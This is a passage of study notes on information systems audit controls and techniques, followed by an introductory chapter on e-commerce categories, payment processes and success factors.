• Inaccurate source data
• Unauthorized source data

Controls
• User authorization of source data input
• Batch control totals
• Log receipt, movement, and disposition of source data input
• Turnaround documents
• Check digit and key verification
• Data editing routines

6. Accurate, Complete, and Confidential Data Files

Threats
• Destruction of stored data from ▫ Errors
▫ Errors
▫ Hardware and software malfunctions
▫ Sabotage
• Unauthorized modification or disclosure of stored data

Controls
• Secure storage of data and restrict physical access
• Logical access controls
• Write-protection and proper file labels
• Concurrent update controls
• Data encryption
• Virus protection
• Backup of data files (offsite)
• System recovery procedures

Audit Techniques Used to Test Programs

• Integrated Test Facility
▫ Uses fictitious inputs
• Snapshot Technique
▫ Master files before and after update are stored for specially marked transactions
• System Control Audit Review File (SCARF)
▫ Continuous monitoring and storing of transactions that meet pre-specifications
• Audit Hooks
▫ Notify auditors of questionable transactions
• Continuous and Intermittent Simulation
▫ Similar to SCARF for DBMS

Software Tools Used to Test Program Logic

• Automated flowcharting program
▫ Interprets source code and generates flowchart
• Automated decision table program
▫ Interprets source code and generates a decision table
• Scanning routines
▫ Searches program for specified items
• Mapping programs
▫ Identifies unexecuted code
• Program tracing
▫ Prints program steps with regular output to observe sequence of program execution events

Computer Audit Software

• Computer assisted audit software that can perform audit tasks on a copy of a company’s data.
Can be used to:
▫ Query data files and retrieve records based upon specified criteria
▫ Create, update, compare, download, and merge files
▫ Summarize, sort, and filter data
▫ Access data in different formats and convert to common format
▫ Select records using statistical sampling techniques
Operational Audits
• Purpose is to evaluate effectiveness, efficiency, and goal achievement. Although the basic audit
steps are the same, the specific activities of evidence collection are focused toward operations
such as:
▫ Review operating policies and documentation
▫ Confirm procedures with management and operating personnel
▫ Observe operating functions and activities
▫ Examine financial and operating plans and reports
▫ Test accuracy of operating information
▫ Test operational controls

Chapter 5
Introduction to e-commerce and e- business

Encompasses the entire online process of developing, marketing, selling, delivering, servicing,
and paying for products and services

Transacted on internetworked, global marketplaces of customers, with the support of worldwide

network of business partners.

Categories of e-Commerce
 Business-to-Consumer (B2C) – businesses develop attractive electronic marketplaces to sell
products and services to consumers.
 Business-to-Business (B2B) – involves both electronic business marketplaces and direct
market links between businesses.
 Consumer-to-Consumer (C2C) – includes auction websites and electronic personal
advertising.

Electronic Payment Processes

 Web Payment – credit card payment processes on the web.

 Electronic Funds Transfer (EFT) –money and credit transfers between banks and businesses
and their customers.
 Secure Electronic Payments –
 encrypting data passing between customer and merchant
 encrypting data passing between customer and company authorizing the credit card
transaction,
 taking sensitive information off-line.

E-Commerce Success Factors

 Selection and Value – attractive product selections, competitive prices, satisfaction

guarantees, and customer support after the sale.
 Performance and Service – fast, easy navigation, shopping, and purchasing, and prompt
shipping and delivery.
 Look and Feel – attractive web storefront, website shipping areas, multimedia product
catalog pages, and shopping feature.
 Advertising and Incentives – targeted web page advertising and e-mail promotions, discounts
and special offers, including advertising at affiliate sites.
 Personal Attention – personal web pages, personalized product recommendations, Web
advertising and e-mail notices, and interactive support for all customers.
 Community Relationships – virtual communities of customers, suppliers, company
representatives, and others via newsgroups, chat rooms, and links to related sites.
 Security and Reliability – security of customer information and website transactions,
trustworthy product information, and reliable order fulfillment.

Infomediaries
 Companies that serve as intermediaries in e-business and e-commerce transactions
 Provide e-commerce marketplace software products and services to power business Web
portals for e-commerce transactions.

E-commerce enablers

 Regulation
 Infrastructure
 Nature of economy
 Level of education